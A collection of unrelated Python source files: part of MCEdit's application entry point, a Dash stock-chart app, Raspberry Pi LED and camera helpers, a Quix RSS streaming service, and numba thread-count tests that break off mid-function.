            elif result == "Cancel":
                return False
        else:
            raise SystemExit

    def saveAndQuit(self):
        """Save the current level, then exit."""
        self.editor.saveFile()
        raise SystemExit

    @staticmethod
    def justQuit():
        """Exit without saving."""
        raise SystemExit
    @classmethod
    def fetch_version(cls):
        """Background-thread target: fetch new-release info into
        cls.version_info, serialized by cls.version_lock."""
        with cls.version_lock:
            cls.version_info = release.fetch_new_version_info()

    def check_for_version(self):
        """If a newer release is available, offer to download or view it."""
        new_version = release.check_for_new_version(self.version_info)
        # check_for_new_version returns False when already up to date.
        if new_version is not False:
            answer = albow.ask(
                _('Version {} is available').format(new_version["tag_name"]),
                [
                    'Download',
                    'View',
                    'Ignore'
                ],
                default=1,
                cancel=2
            )
            if answer == "View":
                platform_open(new_version["html_url"])
            elif answer == "Download":
                platform_open(new_version["asset"]["browser_download_url"])
                albow.alert(_(' {} should now be downloading via your browser. You will still need to extract the downloaded file to use the updated version.').format(new_version["asset"]["name"]))
    @classmethod
    def main(cls):
        """Application main loop: build the root widget tree, run one-time
        startup prompts, then pump the UI until SystemExit/KeyboardInterrupt,
        performing an orderly shutdown (state save, chunk discard, level
        close) on the way out."""
        PlayerCache().load()
        displayContext = GLDisplayContext(splash.splash, caption=(('MCEdit ~ ' + release.get_version()%_("for")).encode('utf-8'), 'MCEdit'))
        os.environ['SDL_VIDEO_CENTERED'] = '0'
        rootwidget = RootWidget(displayContext.display)
        mcedit = MCEdit(displayContext)
        rootwidget.displayContext = displayContext
        rootwidget.confirm_quit = mcedit.confirm_quit
        rootwidget.mcedit = mcedit
        rootwidget.add(mcedit)
        rootwidget.focus_switch = mcedit
        if 0 == len(pymclevel.alphaMaterials.yamlDatas):
            albow.alert("Failed to load minecraft.yaml. Check the console window for details.")
        if mcedit.droppedLevel:
            mcedit.loadFile(mcedit.droppedLevel)
        # Kick off the release check in the background (see fetch_version).
        cls.version_lock = threading.Lock()
        cls.version_info = None
        cls.version_checked = False
        fetch_version_thread = threading.Thread(target=cls.fetch_version)
        fetch_version_thread.start()
        # NOTE: a large commented-out 'esky' auto-update implementation used
        # to live here ("Disabled old update code"); it had been dead for
        # years and was dropped from the comments — see VCS history.
        if config.settings.closeMinecraftWarning.get():
            answer = albow.ask(
                "Warning: Only open a world in one program at a time. If you open a world at the same time in MCEdit and in Minecraft, you will lose your work and possibly damage your save file.\n\n If you are using Minecraft 1.3 or earlier, you need to close Minecraft completely before you use MCEdit.",
                ["Don't remind me again.", "OK"], default=1, cancel=1)
            if answer == "Don't remind me again.":
                config.settings.closeMinecraftWarning.set(False)
        # Crash reporting is permanently disabled (the opt-in prompt that
        # used to live here was removed).
        config.settings.reportCrashes.set(False)
        config.settings.reportCrashesAsked.set(True)
        config.save()
        if "update" in config.version.version.get():
            answer = albow.ask("There are new default controls. Do you want to replace your current controls with the new ones?", ["Yes", "No"])
            if answer == "Yes":
                for configKey, k in keys.KeyConfigPanel.presets["WASD"]:
                    config.keys[config.convert(configKey)].set(k)
            config.version.version.set("1.1.2.0")
            config.save()
        if "-causeError" in sys.argv:
            raise ValueError("Error requested via -causeError")
        while True:
            try:
                rootwidget.run()
            except (SystemExit, KeyboardInterrupt):
                print "Shutting down..."
                exc_txt = traceback.format_exc()
                if mcedit.editor.level:
                    if config.settings.savePositionOnClose.get():
                        mcedit.editor.waypointManager.saveLastPosition(mcedit.editor.mainViewport, mcedit.editor.level.dimNo)
                    mcedit.editor.waypointManager.save()
                # The following Windows specific code won't be executed if we're using '--debug-wm' switch.
                if not USE_WM and sys.platform == "win32" and config.settings.setWindowPlacement.get():
                    (flags, showCmd, ptMin, ptMax, rect) = mcplatform.win32gui.GetWindowPlacement(
                        display.get_wm_info()['window'])
                    X, Y, r, b = rect
                    #w = r-X
                    #h = b-Y
                    if (showCmd == mcplatform.win32con.SW_MINIMIZE or
                            showCmd == mcplatform.win32con.SW_SHOWMINIMIZED):
                        showCmd = mcplatform.win32con.SW_SHOWNORMAL
                    config.settings.windowX.set(X)
                    config.settings.windowY.set(Y)
                    config.settings.windowShowCmd.set(showCmd)
                # Restore the previous language if we ran with '-tt' (update translation template).
                if albow.translate.buildTemplate:
                    logging.warning('Restoring %s.'%orglang)
                    config.settings.langCode.set(orglang)
                #
                config.save()
                mcedit.editor.renderer.discardAllChunks()
                mcedit.editor.deleteAllCopiedSchematics()
                if mcedit.editor.level:
                    mcedit.editor.level.close()
                mcedit.editor.root.RemoveEditFiles()
                # Re-raise only the exit signal that actually triggered the
                # shutdown; exc_txt keeps the original traceback text.
                if 'SystemExit' in traceback.format_exc() or 'KeyboardInterrupt' in traceback.format_exc():
                    raise
                else:
                    if 'SystemExit' in exc_txt:
                        raise SystemExit
                    if 'KeyboardInterrupt' in exc_txt:
                        raise KeyboardInterrupt
            except MemoryError:
                traceback.print_exc()
                mcedit.editor.handleMemoryError()
    def saveWindowPosition(self):
        """Save the window position in the configuration handler."""
        if DEBUG_WM:
            print "############################ EXITING ############################"
        win = self.displayContext.win
        # The following Windows specific code will not be executed if we're using '--debug-wm' switch.
        if not USE_WM and sys.platform == "win32" and config.settings.setWindowPlacement.get():
            (flags, showCmd, ptMin, ptMax, rect) = mcplatform.win32gui.GetWindowPlacement(
                display.get_wm_info()['window'])
            X, Y, r, b = rect
            #w = r-X
            #h = b-Y
            # Never persist a minimized state; reopen as a normal window.
            if (showCmd == mcplatform.win32con.SW_MINIMIZE or
                    showCmd == mcplatform.win32con.SW_SHOWMINIMIZED):
                showCmd = mcplatform.win32con.SW_SHOWNORMAL
            config.settings.windowX.set(X)
            config.settings.windowY.set(Y)
            config.settings.windowShowCmd.set(showCmd)
        elif win:
            config.settings.windowMaximized.set(self.maximized)
            if not self.maximized:
                x, y = win.get_position()
            else:
                # While maximized, keep the last un-maximized position.
                x, y = self.saved_pos
            if DEBUG_WM:
                print "x", x, "y", y
            config.settings.windowX.set(x)
            config.settings.windowY.set(y)

    def restart(self):
        """Persist state, tear the editor down, and re-exec the interpreter
        with the same arguments."""
        self.saveWindowPosition()
        config.save()
        self.editor.renderer.discardAllChunks()
        self.editor.deleteAllCopiedSchematics()
        if self.editor.level:
            self.editor.level.close()
        self.editor.root.RemoveEditFiles()
        python = sys.executable
        if sys.argv[0].endswith('.exe') or hasattr(sys, 'frozen'):
            # Frozen build: argv[0] is the executable itself, skip it.
            os.execl(python, python, * sys.argv[1:])
        else:
            os.execl(python, python, * sys.argv)
def main(argv):
    """
    Setup display, bundled schematics. Handle unclean
    shutdowns.

    Returns 0 on a clean exit; re-raises whatever MCEdit.main() raised
    after closing the display.
    """
    # NOTE: a long commented-out integration with the external
    # 'squash_python' crash reporter used to live here; it had been disabled
    # for years and was dropped from the comments — see VCS history.
    try:
        display.init()
    except pygame.error:
        # SDL failed with the default driver (Windows): retry with
        # DirectX, then the windib fallback.
        os.environ['SDL_VIDEODRIVER'] = 'directx'
        try:
            display.init()
        except pygame.error:
            os.environ['SDL_VIDEODRIVER'] = 'windib'
            display.init()
    pygame.font.init()
    try:
        # First run: seed the schematics folder with the bundled stock files.
        if not os.path.exists(directories.schematicsDir):
            shutil.copytree(
                os.path.join(directories.getDataDir(), u'stock-schematics'),
                directories.schematicsDir
            )
    except Exception, e:
        logging.warning('Error copying bundled schematics: {0!r}'.format(e))
        try:
            os.mkdir(directories.schematicsDir)
        except Exception, e:
            logging.warning('Error creating schematics folder: {0!r}'.format(e))
    try:
        ServerJarStorage()
    except Exception, e:
        logging.warning('Error creating server jar storage folder: {0!r}'.format(e))
    try:
        MCEdit.main()
    except Exception as e:
        print "mcedit.main MCEdit exited with errors."
        logging.error("MCEdit version %s", release.get_version())
        display.quit()
        if hasattr(sys, 'frozen') and sys.platform == 'win32':
            # Frozen Windows build: keep the console open so the user can
            # read the error before the window closes.
            logging.exception("%s", e)
            print "Press RETURN or close this window to dismiss."
            raw_input()
        raise
    return 0
def getSelectedMinecraftVersion():
    """Return the 'lastVersionId' of the launcher profile currently selected
    in the Minecraft profiles JSON, defaulting to '1.8' when absent."""
    profiles = directories.getMinecraftProfileJSON()
    selected = profiles[directories.getSelectedProfile()]
    return selected.get('lastVersionId', '1.8')
def getLatestMinecraftVersion(snapshots=False):
    """Fetch Mojang's version manifest and return the latest version id.

    snapshots: when True, return the latest snapshot id instead of the
    latest stable release id.
    """
    import urllib2
    import json
    # BUG FIX: the manifest URL previously ended with a stray trailing
    # space ("...versions.json "), which made the request target an
    # invalid resource.
    versioninfo = json.loads(urllib2.urlopen("http://s3.amazonaws.com/Minecraft.Download/versions/versions.json").read())
    if snapshots:
        return versioninfo['latest']['snapshot']
    else:
        return versioninfo['latest']['release']
def weird_fix():
    """Force-load PyOpenGL's win32 platform module as a workaround.

    Best-effort: on non-Windows platforms, or when PyOpenGL is missing,
    the import failure is deliberately swallowed.
    """
    try:
        __import__('OpenGL.platform.win32')
    except Exception:
        pass
class FakeStdOutErr:
    """Fake file object to redirect very last Python output.
    Used to track 'errors' not handled in MCEdit.
    Mimics 'write' and 'close' file objects methods.
    Used on Linux only."""
    # Advertise append mode like a real file object would.
    mode = 'a'

    def __init__(self, *args, **kwargs):
        """*args and **kwargs are ignored.
        Deletes the 'logger' object and reopen 'logfile' in append mode."""
        global logger
        global logfile
        # Drop the module-level logger so the log file can be reopened raw.
        del logger
        self.fd = open(logfile, 'a')

    def write(self, msg):
        # File-object protocol: forward writes to the reopened log file.
        self.fd.write(msg)

    def close(self, *args, **kwargs):
        # Flush before closing so no trailing output is lost at interpreter
        # shutdown; *args/**kwargs are accepted for interface compatibility.
        self.fd.flush()
        self.fd.close()
if __name__ == "__main__":
    try:
        main(sys.argv)
    except (SystemExit, KeyboardInterrupt):
        # It happens that on Linux, Python tries to kill already dead processes and display errors in the console.
        # Redirecting them to the log file preserve them and other errors which may occur.
        if sys.platform == "linux2":
            logger.debug("MCEdit is exiting normally.")
            logger.debug("Lines below this one are pure Python output.")
            sys.stdout = sys.stderr = FakeStdOutErr()
        pass
    except:
        # Last-chance handler: show the traceback and keep the console
        # window open until the user acknowledges.
        traceback.print_exc()
        print ""
        print "=================================="
        print "\t\t\t MCEdit has crashed"
        print "=================================="
        raw_input("Press the Enter key to close this window")
        pass
#sys.exit(main(sys.argv))
|
apps.py | # -*- coding: utf-8 -*-
import pandas_datareader.data as web
import datetime
import dash
import dash_core_components as dcc
import dash_html_components as html
import plotly.graph_objs as go
from dash.dependencies import Input, Output
import requests
import pandas as pd
# multiprocessing handel static data request
import multiprocessing
def find_stock(name):
    """Probe the morningstar API for ticker *name*.

    The result is discarded: this runs in a child process (see error_raise)
    purely so a hanging request for a bad ticker can be killed after a
    timeout without blocking the server.
    """
    web.DataReader(name, 'morningstar', datetime.datetime(2015,1,1), datetime.datetime(2015,1,3))
    return
# default stock
## morningstar: historical daily data used for the "from 2016" chart.
defaultStock = 'GOOGL'
start = datetime.datetime(2015,1,1)
end = datetime.datetime.now()
defaultdf = web.DataReader(defaultStock, 'morningstar', start, end)

## alphavantage: 1-minute intraday data used for the daily chart.
alpha_API_URL = "https://www.alphavantage.co/query"
# NOTE(review): placeholder API key — must be replaced with a real key.
alpha_API_key = "xxxxxx"
alpha_params = {"function": "TIME_SERIES_INTRADAY",
                "symbol": defaultStock,
                "interval": "1min",
                "apikey": alpha_API_key
                }
response = requests.get(alpha_API_URL, params=alpha_params)
# Rows = timestamps, columns = open/high/low/close/volume fields.
alpha_df = pd.DataFrame(response.json()['Time Series (1min)']).transpose()
#alpha_df.index = pd.to_datetime(alpha_df.index)
# create app
app = dash.Dash()

# Page layout: title, ticker input, error line, and two side-by-side graphs
# (historical and intraday).
app.layout = html.Div( children=[
    html.H1(
        children='Stocks',
        style = {'textAlign': 'center' }
    ),
    html.Div(
        children='stock ticker',
        style = {'textAlign': 'center' }
    ),
    dcc.Input(
        id = 'input', value = '', type = 'text'
    ),
    html.Div(
        id = 'error-message', children = ''
    ),
    html.Div( children=[
        dcc.Graph(
            id='example-graph'
        ),
        dcc.Graph(
            id='daily-graph'
        )
    ], style={'columnCount': 2}
    )
], style={'textAlign': 'center',
          # 'backgroundColor': '#111111',
          'color': '#69F7AB'})
## error stock ticker catch
@app.callback(
    Output(component_id = 'error-message', component_property = 'children'),
    [Input(component_id = 'input', component_property = 'value')]
)
def error_raise(input_val):
    """Validate the typed ticker and return an error message (or '').

    find_stock is run in a separate process and terminated after one
    second, so an invalid ticker (whose request would otherwise hang)
    surfaces as an error message instead of blocking the server.
    """
    if len(input_val) == 0:
        return 'Please Enter Stock\'s name'
    stock = str(input_val)
    p = multiprocessing.Process(target=find_stock, args=(stock,))
    p.start()
    p.join(1) # wait the request for 1 second
    if p.is_alive():
        print "Request has been running for 1 seconds... let's kill it..."
        # Terminate
        p.terminate()
        p.join()
        return 'Ticker - {} - Request Failed: Please try other names'.format(stock)
    print "Ticker - {} -Request Success".format(stock)
    return ''
## plot static chart
@app.callback(
    Output(component_id = 'example-graph', component_property = 'figure'),
    [Input(component_id = 'input', component_property = 'value'),
     Input(component_id = 'error-message', component_property = 'children')]
)
def update_graph(input_val,error_mes):
    """Return the historical close-price figure for the entered ticker.

    Only refetches when a ticker was entered AND validation produced no
    error message; otherwise the last good data (module-level defaultdf /
    defaultStock) is redrawn.
    """
    global defaultdf
    global defaultStock
    error_mes = str(error_mes)
    if len(input_val) != 0 and len(error_mes) == 0 :
        stock = str(input_val)
        start = datetime.datetime(2016, 1, 1)
        end = datetime.datetime.now()
        df = web.DataReader(stock, 'morningstar' , start, end)
        # Cache as the new fallback for subsequent failed lookups.
        defaultdf = df
        defaultStock = stock
        return {
            'data': [go.Scatter( x=df.index.get_level_values('Date') , y=df.Close )] ,
            'layout': { 'title': input_val + " from 2016", }
        }
    return {
        'data': [go.Scatter( x=defaultdf.index.get_level_values('Date') , y=defaultdf.Close )] ,
        'layout': { 'title': defaultStock + " from 2016", }
    }
## plot daily chart
@app.callback(
    Output(component_id = 'daily-graph', component_property = 'figure'),
    [Input(component_id = 'input', component_property = 'value'),
     Input(component_id = 'error-message', component_property = 'children')]
)
def update_daily(input_val,error_mes):
    """Return the intraday (1-minute) close-price figure.

    Refetches from Alpha Vantage only for a validated non-empty ticker;
    on API error the previous alpha_df is kept and redrawn.
    """
    global alpha_df
    global defaultStock
    error_mes = str(error_mes)
    if len(input_val) != 0 and len(error_mes) == 0 :
        params = {"function": "TIME_SERIES_INTRADAY",
                  "symbol": str(input_val),
                  "interval": "1min",
                  "apikey": alpha_API_key
                  }
        response = requests.get(alpha_API_URL, params=params)
        response = response.json()
        # Handle request errors: on failure keep the previous alpha_df.
        if 'Error Message' in response:
            pass
        else:
            alpha_df = pd.DataFrame(response['Time Series (1min)']).transpose()
            defaultStock = str(input_val)
    return {
        'data': [go.Scatter( x=alpha_df.index,
                             y=alpha_df['4. close'],
                             ) ],
        'layout': {
            'height': 430,
            'title': defaultStock + " Daily",
            'xaxis': {'showgrid': False}
        }
    }
# Start the Dash development server (debug=True enables hot reload; not
# suitable for production deployment).
if __name__ == '__main__':
    app.run_server(debug=True)
|
effect.py | import time
from threading import Thread
from rpi_ws281x import Color
class Effect:
    """Base class for LED-strip effects.

    Subclasses override update() to render one frame onto the strip.
    """

    def __init__(self, strip):
        # The LED strip object this effect renders onto.
        self.strip = strip

    def update(self):
        """Render one frame. The base implementation does nothing."""
        return None
class EffectManager:
    """Owns the known effects and drives the active one from a render thread.

    States are switched via change_state('name') or change_state('name:arg'),
    e.g. 'preparing:50' for 50% progress.
    """
    def __init__(self, strip):
        self.strip = strip
        # Optional argument for the active effect (e.g. progress percentage).
        # NOTE: change_state() stores it as a string when supplied.
        self.arg = 0
        self.states = {
            'idle': IdleEffect(strip),
            'preparing': PreparingEffect(strip)
        }
        self.currentState = 'idle'
        # NOTE(review): non-daemon thread keeps the process alive forever;
        # confirm that is intended before making it a daemon.
        thread = Thread(target=self.update)
        thread.start()
    def change_state(self, rawState):
        """Switch the active state given 'name' or 'name:arg'."""
        parts = rawState.split(':')
        state = parts[0]
        if len(parts) > 1:
            self.arg = parts[1]
        if state in self.states:
            # BUG FIX: previously assigned state.split(':') (a list), which made
            # the dict lookup in update() raise TypeError (unhashable key).
            # Store the plain state name instead.
            self.currentState = state
    def update(self):
        # Render loop: draw the current effect at roughly 60 FPS.
        while True:
            self.states[self.currentState].update(self.arg)
            time.sleep(0.016)
class IdleEffect(Effect):
    """Paints the whole strip a solid gold colour while idle."""
    def update(self, _progress):
        # The progress argument is unused for the idle animation.
        gold = Color(255, 215, 0)
        pixel_total = self.strip.numPixels()
        for index in range(pixel_total):
            self.strip.setPixelColor(index, gold)
        self.strip.show()
class PreparingEffect(Effect):
    """Fills the strip cyan in proportion to a 0-100 progress value."""
    def update(self, progress):
        # BUG FIX: EffectManager.change_state() delivers the argument as a
        # string (e.g. 'preparing:50' -> '50'), so coerce before the division;
        # previously a str progress raised TypeError here.
        pixelCount = int(self.strip.numPixels() * (float(progress) / 100.0))
        for i in range(pixelCount):
            self.strip.setPixelColor(i, Color(0, 255, 255))
        self.strip.show()
PiCam.py | # built upon: https://github.com/jrosebr1/imutils/blob/master/imutils/video/pivideostream.py
from picamera.array import PiRGBArray
from picamera import PiCamera
from threading import Thread
# import cv2
# import numpy as np
import json
class PiCam:
    """Threaded Raspberry Pi camera reader.

    Continuously captures frames in a daemon thread so read() always returns
    the most recent frame without blocking.
    """
    def __init__(self, resolution=(640, 480)):
        """Configure the camera from config/config.json and open the stream.

        NOTE(review): the ``resolution`` parameter is immediately overwritten
        by the value from the config file, so callers cannot override it —
        confirm whether config precedence is intended.
        """
        # initialize the camera
        # self.update_values()
        self.frame = None
        # init thread
        self.stopped = False
        # init check to identify duplicate frames
        self.frame_count = 0
        config_path = 'config/config.json'
        with open(config_path) as config_file:
            config = json.load(config_file)
        self.camera = PiCamera()
        # set resolution
        resolution = config["picam_config"]["resolution"]["set"]
        self.camera.resolution = (resolution[0], resolution[1])
        #print(self.camera.resolution)
        # set picamera setting
        # picamera settings https://picamera.readthedocs.io/en/release-1.10/api_camera.html
        self.camera.framerate = config["picam_config"]["framerate"]
        self.camera.awb_mode = config["picam_config"]["awb_mode"]
        self.camera.awb_gains = config["picam_config"]["awb_gains"]
        self.camera.exposure_mode = config["picam_config"]["exposure_mode"]
        self.camera.image_effect = config["picam_config"]["image_effect"]["set"]
        #print(self.camera.image_effect)
        # Reusable capture buffer + continuous BGR capture generator.
        self.rawCapture = PiRGBArray(self.camera, size=resolution)
        self.stream = self.camera.capture_continuous(self.rawCapture,
            format="bgr", use_video_port=True)
        # Flag is set here but never read in this class; external users may
        # poll it — left untouched.
        self.picam_fully_stopped = False
    # def update_values(self):
    def start(self):
        """Launch the background capture thread and return self for chaining."""
        # start the thread to read frames from the video stream
        t = Thread(target=self.update, args=())
        t.daemon = True
        t.start()
        return self
    def update(self):
        """Capture loop run on the background thread until stop() is called."""
        # keep looping infinitely until the thread is stopped
        for f in self.stream:
            # if the thread indicator variable is set, stop the thread
            # and resource camera resources
            if self.stopped:
                self.stream.close()
                self.rawCapture.close()
                self.camera.close()
                return
            # grab the frame from the stream and clear the stream in
            # preparation for the next frame
            self.frame = f.array
            # set to check if frame was updated in main thread
            if self.frame_count < 1000:
                self.frame_count += 1
            else:
                # reset counter
                self.frame_count = 0
            self.rawCapture.truncate(0)
    def read(self):
        """Return the most recently captured frame (None before first frame)."""
        return self.frame
    def stop(self):
        """Request the capture loop to exit and release the camera."""
        # indicate that the thread should be stopped
        self.stopped = True
main.py | from quixstreaming import QuixStreamingClient
from quixstreaming.state.localfilestorage import LocalFileStorage
import quixstreaming as qs
# use feed parser
import feedparser
import os
from datetime import datetime
import json
import time
import threading
# Persisted key/value state used to remember which feed items were seen.
storage = LocalFileStorage()
# Quix client; connection details come from its environment/config.
client = QuixStreamingClient()
output_topic = client.open_output_topic(os.environ["output"])
# One stream per process run, named with the start timestamp.
stream_writer = output_topic.create_stream("RSS Data" + datetime.now().strftime("%m-%d-%Y--%H-%M-%S"))
# should the main loop keep going?
shutting_down = False
# store the id's so we dont duplicate feed items
ids = []
def log(message: str):
    """Print *message* prefixed with the current timestamp."""
    print(f"{datetime.now()} - {message}")
# Restore previously-seen feed item ids so a restart does not re-emit entries.
if storage.containsKey("rss_ids"):
    ids = storage.get("rss_ids")
    log("ids loaded from state")
def main():
    """Poll the RSS feed and forward new entries to Quix until shutdown.

    Runs on a worker thread; before_shutdown() flips the module-level
    ``shutting_down`` flag to stop the loop.
    """
    while not shutting_down:
        rss = feedparser.parse(os.environ["rss_url"])
        new_items = 0
        # iterate through the entries
        for e in rss.entries:
            rss_id = e["id"]
            if rss_id in ids:
                log("Already seen this one!")
                continue # comment this line if you want constant data and dont care about duplicates
            # add the id, so we know we've seen this one
            ids.append(rss_id)
            # write the rss feed entry to Quix as an event
            stream_writer.events \
                .add_timestamp(datetime.now()) \
                .add_value("RSS_RAW", json.dumps(e))\
                .write()
            # also write it as parameter data
            # these will be individual parameters, groupable by RSS_ID
            timestamp = stream_writer.parameters.buffer.add_timestamp(datetime.now())
            # iterate the datas keys
            for key in e.keys():
                value = str(e[key]) # convert everything to a string
                timestamp \
                    .add_tag("RSS_ID", rss_id) \
                    .add_value(key, value)
            # write the data
            timestamp.write()
            # just flush to be sure its all gone
            stream_writer.events.flush()
            stream_writer.parameters.flush()
            new_items += 1
        log("Written {} RSS items to stream".format(new_items))
        # Sleep between polls when nothing new arrived; skip the sleep when
        # fresh items were found (there might be hot news breaking).
        # BUG FIX: the old loop ran "while sleeping <= 5", so it slept at most
        # ~6 seconds regardless of sleep_time, and the logged duration
        # (abs(sleeping - sleep_time)) did not match the actual sleep.
        sleep_time = 50 # can change the sleep time to whatever you want
        sleeping = 0 if new_items > 0 else sleep_time
        message = "Not much is happening" if new_items == 0 else "Things are heating up"
        log("{} sleeping for {} seconds".format(message, sleeping))
        # sleep in 1-second slices so a shutdown request interrupts promptly
        slept = 0
        while slept < sleeping and not shutting_down:
            slept += 1
            time.sleep(1)
# handle shutdown nicely
def before_shutdown():
    """Signal main() to exit and persist the list of seen RSS ids."""
    global shutting_down
    shutting_down = True  # tell the polling loop in main() we're heading out
    storage.set("rss_ids", ids)  # commit the latest rss_id list to persisted storage
if __name__ == "__main__":
    # create and start the thread where all the good stuff happens
    main_thread = threading.Thread(target = main)
    main_thread.start()
    # run the app and handle shutdown nicely
    qs.App.run(before_shutdown=before_shutdown)
    # wait for the polling loop to notice shutting_down and drain
    main_thread.join()
test_num_threads.py | # -*- coding: utf-8 -*-
from __future__ import print_function, absolute_import, division
import sys
import os
import re
import multiprocessing
import unittest
import numpy as np
from numba import (njit, set_num_threads, get_num_threads, prange, config,
threading_layer, guvectorize)
from numba.np.ufunc.parallel import _get_thread_id
from numba.core.errors import TypingError
from numba.tests.support import TestCase, skip_parfors_unsupported, tag
from numba.tests.test_parallel_backend import TestInSubprocess
class TestNumThreads(TestCase):
    """Tests for numba's set_num_threads/get_num_threads across backends.

    NOTE: methods prefixed with ``_test_`` are not collected by unittest
    directly; TestNumThreadsBackends.generate() injects one subprocess-run
    wrapper per (method, threading layer, thread count) combination.
    """
    _numba_parallel_test_ = False
    def setUp(self):
        """Reset the thread count to the configured maximum before each test."""
        # Make sure the num_threads is set to the max. This also makes sure
        # the threads are launched.
        set_num_threads(config.NUMBA_NUM_THREADS)
    def check_mask(self, expected, result):
        """Backend-aware assertion that *result* matches the *expected* mask."""
        # There's no guarantee that TBB will use a full mask worth of
        # threads if it deems it inefficient to do so
        if threading_layer() == 'tbb':
            self.assertTrue(np.all(result <= expected))
        elif threading_layer() in ('omp', 'workqueue'):
            np.testing.assert_equal(expected, result)
        else:
            assert 0, 'unreachable'
    @skip_parfors_unsupported
    def test_set_num_threads_type(self):
        """set_num_threads must reject non-integers both jitted and in pure Python."""
        @njit
        def foo():
            set_num_threads('wrong_type')
        expected = "The number of threads specified must be an integer"
        for fn, errty in ((foo, TypingError), (foo.py_func, TypeError)):
            with self.assertRaises(errty) as raises:
                fn()
            self.assertIn(expected, str(raises.exception))
    @skip_parfors_unsupported
    @unittest.skipIf(config.NUMBA_NUM_THREADS < 2, "Not enough CPU cores")
    def _test_set_num_threads_basic(self):
        max_threads = config.NUMBA_NUM_THREADS
        self.assertEqual(get_num_threads(), max_threads)
        set_num_threads(2)
        self.assertEqual(get_num_threads(), 2)
        set_num_threads(max_threads)
        self.assertEqual(get_num_threads(), max_threads)
        # 0 and > max are out of the valid [1, NUMBA_NUM_THREADS] range
        with self.assertRaises(ValueError):
            set_num_threads(0)
        with self.assertRaises(ValueError):
            set_num_threads(max_threads + 1)
    @skip_parfors_unsupported
    @unittest.skipIf(config.NUMBA_NUM_THREADS < 2, "Not enough CPU cores")
    def _test_set_num_threads_basic_jit(self):
        max_threads = config.NUMBA_NUM_THREADS
        @njit
        def get_n():
            return get_num_threads()
        self.assertEqual(get_n(), max_threads)
        set_num_threads(2)
        self.assertEqual(get_n(), 2)
        set_num_threads(max_threads)
        self.assertEqual(get_n(), max_threads)
        @njit
        def set_get_n(n):
            set_num_threads(n)
            return get_num_threads()
        self.assertEqual(set_get_n(2), 2)
        self.assertEqual(set_get_n(max_threads), max_threads)
    @skip_parfors_unsupported
    @unittest.skipIf(config.NUMBA_NUM_THREADS < 2, "Not enough CPU cores")
    def _test_set_num_threads_basic_guvectorize(self):
        max_threads = config.NUMBA_NUM_THREADS
        @guvectorize(['void(int64[:])'],
                     '(n)',
                     nopython=True,
                     target='parallel')
        def get_n(x):
            x[:] = get_num_threads()
        x = np.zeros((5000000,), dtype=np.int64)
        get_n(x)
        np.testing.assert_equal(x, max_threads)
        set_num_threads(2)
        x = np.zeros((5000000,), dtype=np.int64)
        get_n(x)
        np.testing.assert_equal(x, 2)
        set_num_threads(max_threads)
        x = np.zeros((5000000,), dtype=np.int64)
        get_n(x)
        np.testing.assert_equal(x, max_threads)
        @guvectorize(['void(int64[:])'],
                     '(n)',
                     nopython=True,
                     target='parallel')
        def set_get_n(n):
            set_num_threads(n[0])
            n[:] = get_num_threads()
        x = np.zeros((5000000,), dtype=np.int64)
        x[0] = 2
        set_get_n(x)
        np.testing.assert_equal(x, 2)
        x = np.zeros((5000000,), dtype=np.int64)
        x[0] = max_threads
        set_get_n(x)
        np.testing.assert_equal(x, max_threads)
    @skip_parfors_unsupported
    @unittest.skipIf(config.NUMBA_NUM_THREADS < 2, "Not enough CPU cores")
    def _test_set_num_threads_outside_jit(self):
        # Test set_num_threads outside a jitted function
        set_num_threads(2)
        @njit(parallel=True)
        def test_func():
            x = 5
            buf = np.empty((x,))
            for i in prange(x):
                buf[i] = get_num_threads()
            return buf
        @guvectorize(['void(int64[:])'],
                     '(n)',
                     nopython=True,
                     target='parallel')
        def test_gufunc(x):
            x[:] = get_num_threads()
        out = test_func()
        np.testing.assert_equal(out, 2)
        x = np.zeros((5000000,), dtype=np.int64)
        test_gufunc(x)
        np.testing.assert_equal(x, 2)
    @skip_parfors_unsupported
    @unittest.skipIf(config.NUMBA_NUM_THREADS < 2, "Not enough CPU cores")
    def _test_set_num_threads_inside_jit(self):
        # Test set_num_threads inside a jitted function
        @njit(parallel=True)
        def test_func(nthreads):
            x = 5
            buf = np.empty((x,))
            set_num_threads(nthreads)
            for i in prange(x):
                buf[i] = get_num_threads()
            return buf
        mask = 2
        out = test_func(mask)
        np.testing.assert_equal(out, mask)
    @skip_parfors_unsupported
    @unittest.skipIf(config.NUMBA_NUM_THREADS < 2, "Not enough CPU cores")
    def _test_set_num_threads_inside_guvectorize(self):
        # Test set_num_threads inside a jitted guvectorize function
        @guvectorize(['void(int64[:])'],
                     '(n)',
                     nopython=True,
                     target='parallel')
        def test_func(x):
            set_num_threads(x[0])
            x[:] = get_num_threads()
        x = np.zeros((5000000,), dtype=np.int64)
        mask = 2
        x[0] = mask
        test_func(x)
        np.testing.assert_equal(x, mask)
    @skip_parfors_unsupported
    @unittest.skipIf(config.NUMBA_NUM_THREADS < 2, "Not enough CPU cores")
    def _test_get_num_threads_truth_outside_jit(self):
        for mask in range(2, min(6, config.NUMBA_NUM_THREADS + 1)):
            set_num_threads(mask)
            # a lot of work, hopefully will trigger "mask" count of threads to
            # join the parallel region (for those backends with dynamic threads)
            @njit(parallel=True)
            def test_func():
                x = 5000000
                buf = np.empty((x,))
                for i in prange(x):
                    buf[i] = _get_thread_id()
                return len(np.unique(buf)), get_num_threads()
            out = test_func()
            self.check_mask((mask, mask), out)
            @guvectorize(['void(int64[:], int64[:])'],
                         '(n), (m)',
                         nopython=True,
                         target='parallel')
            def test_gufunc(x, out):
                x[:] = _get_thread_id()
                out[0] = get_num_threads()
            # Reshape to force parallelism
            x = np.full((5000000,), -1, dtype=np.int64).reshape((100, 50000))
            out = np.zeros((1,), dtype=np.int64)
            test_gufunc(x, out)
            self.check_mask(mask, out)
            self.check_mask(mask, len(np.unique(x)))
    @skip_parfors_unsupported
    @unittest.skipIf(config.NUMBA_NUM_THREADS < 2, "Not enough CPU cores")
    def _test_get_num_threads_truth_inside_jit(self):
        for mask in range(2, min(6, config.NUMBA_NUM_THREADS + 1)):
            # a lot of work, hopefully will trigger "mask" count of threads to
            # join the parallel region (for those backends with dynamic threads)
            @njit(parallel=True)
            def test_func():
                set_num_threads(mask)
                x = 5000000
                buf = np.empty((x,))
                for i in prange(x):
                    buf[i] = _get_thread_id()
                return len(np.unique(buf)), get_num_threads()
            out = test_func()
            self.check_mask((mask, mask), out)
            @guvectorize(['void(int64[:], int64[:])'],
                         '(n), (m)',
                         nopython=True,
                         target='parallel')
            def test_gufunc(x, out):
                set_num_threads(mask)
                x[:] = _get_thread_id()
                out[0] = get_num_threads()
            # Reshape to force parallelism
            x = np.full((5000000,), -1, dtype=np.int64).reshape((100, 50000))
